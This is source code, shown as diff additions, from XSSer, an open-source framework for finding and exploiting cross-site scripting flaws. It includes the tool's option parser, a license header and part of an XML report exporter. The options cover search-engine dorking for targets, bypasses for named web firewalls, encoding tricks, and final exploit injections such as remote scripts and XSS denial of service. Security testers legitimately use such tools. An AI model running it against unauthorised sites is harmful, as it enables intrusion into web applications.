+    def __init__(self, *args):
+        optparse.OptionParser.__init__(self, 
+                           description='Cross Site "Scripter" is an automatic -framework- to detect, exploit and\nreport XSS vulnerabilities in web-based applications.',
+                           prog='XSSer.py',
+			   version='\nXSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2018 - (GPLv3.0) -> by psy\n',
+                           usage= '\n\nxsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]\n[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}')
+        self.set_defaults(verbose=False, threads=5, retries=1, delay=0, timeout=30,
+                          silent=False)
+        self.disable_interspersed_args()
+        self.vectors_fuzz = len(core.fuzzing.vectors.vectors)
+        self.vectors_dcp = len(core.fuzzing.DCP.DCPvectors)
+        self.vectors_dom = len(core.fuzzing.DOM.DOMvectors)
+        self.vectors_httpsr = len(core.fuzzing.HTTPsr.HTTPrs_vectors)
+        self.total_vectors = str(self.vectors_fuzz+self.vectors_dcp+self.vectors_dom+self.vectors_httpsr)
+
+        self.add_option("-s", "--statistics",  action="store_true", dest="statistics", help="show advanced statistics output results")
+        self.add_option("-v", "--verbose", action="store_true", dest="verbose", help="active verbose mode output results")
+        self.add_option("--gtk", action="store_true", dest="xsser_gtk", help="launch XSSer GTK Interface")
+        #self.add_option("--swarm", action="store_true", dest="xsser_web", help="launch XSSer Swarm daemon(s) + Web-Shell")
+        self.add_option("--wizard", action="store_true", dest="wizard", help="start Wizard Helper!")
+
+        group1 = optparse.OptionGroup(self, "*Special Features*",
+        "You can set Vector(s) and Bypasser(s) to build complex scripts for XSS code embedded. XST allows you to discover if target is vulnerable to 'Cross Site Tracing' [CAPEC-107]:")
+        group1.add_option("--imx", action="store", dest="imx", help="IMX - Create an image with XSS (--imx image.png)")
+        group1.add_option("--fla", action="store", dest="flash", help="FLA - Create a flash movie with XSS (--fla movie.swf)")
+        group1.add_option("--xst", action="store", dest="xst", help="XST - Cross Site Tracing (--xst http(s)://host.com)")
+        self.add_option_group(group1)
+
+        group2 = optparse.OptionGroup(self, "*Select Target(s)*",
+        "At least one of these options must to be specified to set the source to get target(s) urls from:")
+        group2.add_option("--all", action="store", dest="target", help="Automatically audit an entire target")
+        group2.add_option("-u", "--url", action="store", dest="url", help="Enter target to audit") 
+        group2.add_option("-i", action="store", dest="readfile", help="Read target(s) urls from file")
+        group2.add_option("-d", action="store", dest="dork", help="Search target(s) using a query (ex: 'news.php?id=')")
+        group2.add_option("-l", action="store_true", dest="dork_file", help="Search from a list of 'dorks'")
+        group2.add_option("--De", action="store", dest="dork_engine", help="Use this search engine (default: yahoo)")
+        group2.add_option("--Da", action="store_true", dest="dork_mass", help="Search massively using all search engines")
+        self.add_option_group(group2)
+
+        group3 = optparse.OptionGroup(self, "*Select type of HTTP/HTTPS Connection(s)*",
+        "These options can be used to specify which parameter(s) we want to use as payload(s). Set 'XSS' as keyword on the place(s) that you want to inject:")
+        group3.add_option("-g", action="store", dest="getdata", help="Send payload using GET (ex: '/menu.php?id=3&q=XSS')")
+        group3.add_option("-p", action="store", dest="postdata", help="Send payload using POST (ex: 'foo=1&bar=XSS')")
+        group3.add_option("-c", action="store", dest="crawling", help="Number of urls to crawl on target(s): 1-99999")
+        group3.add_option("--Cw", action="store", dest="crawler_width", help="Deeping level of crawler: 1-5 (default 3)")
+        group3.add_option("--Cl", action="store_true", dest="crawler_local", help="Crawl only local target(s) urls (default TRUE)") 
+        self.add_option_group(group3)
+
+        group4 = optparse.OptionGroup(self, "*Configure Request(s)*",
+        "These options can be used to specify how to connect to the target(s) payload(s). You can choose multiple:") 
+        group4.add_option("--cookie", action="store", dest="cookie", help="Change your HTTP Cookie header")
+        group4.add_option("--drop-cookie", action="store_true", dest="dropcookie", help="Ignore Set-Cookie header from response")
+        group4.add_option("--user-agent", action="store", dest="agent", help="Change your HTTP User-Agent header (default SPOOFED)")
+        group4.add_option("--referer", action="store", dest="referer", help="Use another HTTP Referer header (default NONE)")
+        group4.add_option("--xforw", action="store_true", dest="xforw", help="Set your HTTP X-Forwarded-For with random IP values")
+        group4.add_option("--xclient", action="store_true", dest="xclient", help="Set your HTTP X-Client-IP with random IP values")
+        group4.add_option("--headers", action="store", dest="headers", help="Extra HTTP headers newline separated")
+        group4.add_option("--auth-type", action="store", dest="atype", help="HTTP Authentication type (Basic, Digest, GSS or NTLM)") 
+        group4.add_option("--auth-cred", action="store", dest="acred", help="HTTP Authentication credentials (name:password)")
+        #group4.add_option("--auth-cert", action="store", dest="acert", help="HTTP Authentication certificate (key_file,cert_file)") 
+        group4.add_option("--proxy", action="store", dest="proxy", help="Use proxy server (tor: http://localhost:8118)")
+        group4.add_option("--ignore-proxy", action="store_true", dest="ignoreproxy", help="Ignore system default HTTP proxy")
+        group4.add_option("--timeout", action="store", dest="timeout", type="int", help="Select your timeout (default 30)")
+        group4.add_option("--retries", action="store", dest="retries", type="int", help="Retries when the connection timeouts (default 1)")
+        group4.add_option("--threads", action="store", dest="threads", type="int", help="Maximum number of concurrent HTTP requests (default 5)") 
+        group4.add_option("--delay", action="store", dest="delay", type="int", help="Delay in seconds between each HTTP request (default 0)")
+        group4.add_option("--tcp-nodelay", action="store_true", dest="tcp_nodelay", help="Use the TCP_NODELAY option")
+        group4.add_option("--follow-redirects", action="store_true", dest="followred", help="Follow server redirection responses (302)")
+        group4.add_option("--follow-limit", action="store", dest="fli", type="int", help="Set limit for redirection requests (default 50)")
+        self.add_option_group(group4)
+
+        group5 = optparse.OptionGroup(self, "*Checker Systems*",
+        "These options are useful to know if your target is using filters against XSS attacks:")
+        group5.add_option("--hash", action="store_true", dest="hash", help="send a hash to check if target is repeating content")
+        group5.add_option("--heuristic", action="store_true", dest="heuristic", help="discover parameters filtered by using heuristics")
+        group5.add_option("--discode", action="store", dest="discode", help="set code on reply to discard an injection")
+        group5.add_option("--checkaturl", action="store", dest="alt", help="check reply using: alternative url -> Blind XSS")
+        group5.add_option("--checkmethod", action="store", dest="altm", help="check reply using: GET or POST (default: GET)")
+        group5.add_option("--checkatdata", action="store", dest="ald", help="check reply using: alternative payload") 
+        group5.add_option("--reverse-check", action="store_true", dest="reversecheck", help="establish a reverse connection from target to XSSer to certify that is 100% vulnerable (recommended!)")
+        self.add_option_group(group5)
+
+        group6 = optparse.OptionGroup(self, "*Select Vector(s)*",
+        "These options can be used to specify injection(s) code. Important if you don't want to inject a common XSS vector used by default. Choose only one option:")
+        group6.add_option("--payload", action="store", dest="script", help="OWN  - Inject your own code")
+        group6.add_option("--auto", action="store_true", dest="fuzz", help="AUTO - Inject a list of vectors provided by XSSer")
+        self.add_option_group(group6)
+
+        group13 = optparse.OptionGroup(self, "*Anti-antiXSS Firewall rules*",
+        "These options can be used to try to bypass specific WAF/IDS products. Choose only if required:")
+        group13.add_option("--Phpids0.6.5", action="store_true", dest="phpids065", help="PHPIDS (0.6.5) [ALL]")
+        group13.add_option("--Phpids0.7", action="store_true", dest="phpids070", help="PHPIDS (0.7) [ALL]")
+        group13.add_option("--Imperva", action="store_true", dest="imperva", help="Imperva Incapsula [ALL]")
+        group13.add_option("--Webknight", action="store_true", dest="webknight", help="WebKnight (4.1) [Chrome]")
+        group13.add_option("--F5bigip", action="store_true", dest="f5bigip", help="F5 Big IP [Chrome + FF + Opera]")
+        group13.add_option("--Barracuda", action="store_true", dest="barracuda", help="Barracuda WAF [ALL]")
+        group13.add_option("--Modsec", action="store_true", dest="modsec", help="Mod-Security [ALL]")
+        group13.add_option("--Quickdefense", action="store_true", dest="quickdefense", help="QuickDefense [Chrome]")
+        self.add_option_group(group13)
+       
+        group7 = optparse.OptionGroup(self, "*Select Bypasser(s)*",
+        "These options can be used to encode vector(s) and try to bypass possible anti-XSS filters. They can be combined with other techniques:")
+        group7.add_option("--Str", action="store_true", dest="Str", help="Use method String.FromCharCode()")
+        group7.add_option("--Une", action="store_true", dest="Une", help="Use Unescape() function")
+        group7.add_option("--Mix", action="store_true", dest="Mix", help="Mix String.FromCharCode() and Unescape()")
+        group7.add_option("--Dec", action="store_true", dest="Dec", help="Use Decimal encoding")
+        group7.add_option("--Hex", action="store_true", dest="Hex", help="Use Hexadecimal encoding")
+        group7.add_option("--Hes", action="store_true", dest="Hes", help="Use Hexadecimal encoding with semicolons")
+        group7.add_option("--Dwo", action="store_true", dest="Dwo", help="Encode IP addresses with DWORD")
+        group7.add_option("--Doo", action="store_true", dest="Doo", help="Encode IP addresses with Octal")
+        group7.add_option("--Cem", action="store", dest="Cem", help="Set different 'Character Encoding Mutations' (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')")
+        self.add_option_group(group7)
+
+        group8 = optparse.OptionGroup(self, "*Special Technique(s)*",
+        "These options can be used to inject code using different XSS techniques. You can choose multiple:")
+        group8.add_option("--Coo", action="store_true", dest="coo", help="COO - Cross Site Scripting Cookie injection")
+        group8.add_option("--Xsa", action="store_true", dest="xsa", help="XSA - Cross Site Agent Scripting")
+        group8.add_option("--Xsr", action="store_true", dest="xsr", help="XSR - Cross Site Referer Scripting")
+        group8.add_option("--Dcp", action="store_true", dest="dcp", help="DCP - Data Control Protocol injections")
+        group8.add_option("--Dom", action="store_true", dest="dom", help="DOM - Document Object Model injections")
+        group8.add_option("--Ind", action="store_true", dest="inducedcode", help="IND - HTTP Response Splitting Induced code")
+        group8.add_option("--Anchor", action="store_true", dest="anchor", help="ANC - Use Anchor Stealth payloader (DOM shadows!)")
+        self.add_option_group(group8)
+
+        group9 = optparse.OptionGroup(self, "*Select Final injection(s)*",
+        "These options can be used to specify the final code to inject on vulnerable target(s). Important if you want to exploit 'on-the-wild' the vulnerabilities found. Choose only one option:")
+        group9.add_option("--Fp", action="store", dest="finalpayload", help="OWN    - Exploit your own code")
+        group9.add_option("--Fr", action="store", dest="finalremote", help="REMOTE - Exploit a script -remotely-")
+        group9.add_option("--Doss", action="store_true", dest="doss", help="DOSs   - XSS (server) Denial of Service")
+        group9.add_option("--Dos", action="store_true", dest="dos", help="DOS    - XSS (client) Denial of Service")
+        group9.add_option("--B64", action="store_true", dest="b64", help="B64    - Base64 code encoding in META tag (rfc2397)")
+        self.add_option_group(group9)
+        
+        group10 = optparse.OptionGroup(self, "*Special Final injection(s)*",
+        "These options can be used to execute some 'special' injection(s) on vulnerable target(s). You can select multiple and combine them with your final code (except with DCP code):")
+        group10.add_option("--Onm", action="store_true", dest="onm", help="ONM - Use onMouseMove() event")
+        group10.add_option("--Ifr", action="store_true", dest="ifr", help="IFR - Use <iframe> source tag")
+        self.add_option_group(group10)
+
+        group11 = optparse.OptionGroup(self, "*Reporting*")
+        group11.add_option("--save", action="store_true", dest="fileoutput", help="export to file (XSSreport.raw)")
+        group11.add_option("--xml", action="store", dest="filexml", help="export to XML (--xml file.xml)")
+        self.add_option_group(group11)
+
+        group12 = optparse.OptionGroup(self, "*Miscellaneous*")
+        group12.add_option("--silent", action="store_true", dest="silent", help="inhibit console output results")
+        group12.add_option("--no-head", action="store_true", dest="nohead", help="NOT send a HEAD request before start a test")
+        group12.add_option("--alive", action="store", dest="isalive", type="int", help="set limit of errors before check if target is alive")
+        group12.add_option("--update", action="store_true", dest="update", help="check for latest stable version")
+        self.add_option_group(group12)
+
+    def get_options(self, user_args=None):
+        (options, args) = self.parse_args(user_args)
+        if (not options.url and not options.readfile and not options.dork and not options.dork_file and not options.imx and not options.flash and not options.update and not options.xsser_gtk and not options.wizard and not options.xst and not options.target):
+            print "\n", '='*75
+            print self.version
+            print "-----------", "\n"
+            print self.description, "\n"
+            print '='*75
+            print ""
+            print "                                       \\ \\                           %"
+            print "Project site:","                          \\ \\     LulZzzz!           %  "
+            print "http://xsser.03c8.net                 %% \\_\\                      %   "
+            print "                                      \/ ( \033[1;31m@\033[1;m.\033[1;31m@\033[1;m)         Bbzzzzz!      %  "
+            print "                                       \== < ==                  %      "
+            print "Forum:                                    / \_      ==       %          "
+            print "irc.freenode.net -> #xsser              (')   \   *=====%             "
+            print "                                       /  /       ========              "
+            print ""
+            print '='*75
+            print "Total vectors:", self.total_vectors + " = XSS: " + str(self.vectors_fuzz) + " + DCP: " + str(self.vectors_dcp) + " + DOM: " + str(self.vectors_dom) + " + HTTPsr: " + str(self.vectors_httpsr)
+            print '='*75
+            print "\n-> For HELP use: -h or --help"
+            print "\n-> For GTK interface use: --gtk\n"
+            print '='*55, "\n"
+            return False
+        return options

+ 20 - 0
xsser/core/post/__init__.py

@@ -0,0 +1,20 @@
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""

+ 173 - 0
xsser/core/post/xml_exporter.py

@@ -0,0 +1,173 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import xml.etree.ElementTree as ET
+import datetime
+
+class xml_reporting(object):
+    """
+    Print results from an attack in an XML fashion
+    """
+    def __init__(self, xsser):
+        # initialize main XSSer
+        self.instance = xsser
+
+	# some counters
+        self.xsr_found = 0
+        self.xsa_found = 0
+        self.coo_found = 0
+        self.dcp_found = 0
+        self.dom_found = 0
+        self.ind_found = 0
+
+    def print_xml_results(self, filename):
+        root = ET.Element("report")
+        hdr = ET.SubElement(root, "header")
+        title = ET.SubElement(hdr, "title")
+        title.text = "XSSer Security Report: " + str(datetime.datetime.now())
+        abstract = ET.SubElement(root, "abstract")
+        total_injections = len(self.instance.hash_found) + len(self.instance.hash_notfound)
+
+        if len(self.instance.hash_found) + len(self.instance.hash_notfound) == 0:
+            pass 
+        injections = ET.SubElement(abstract, "injections")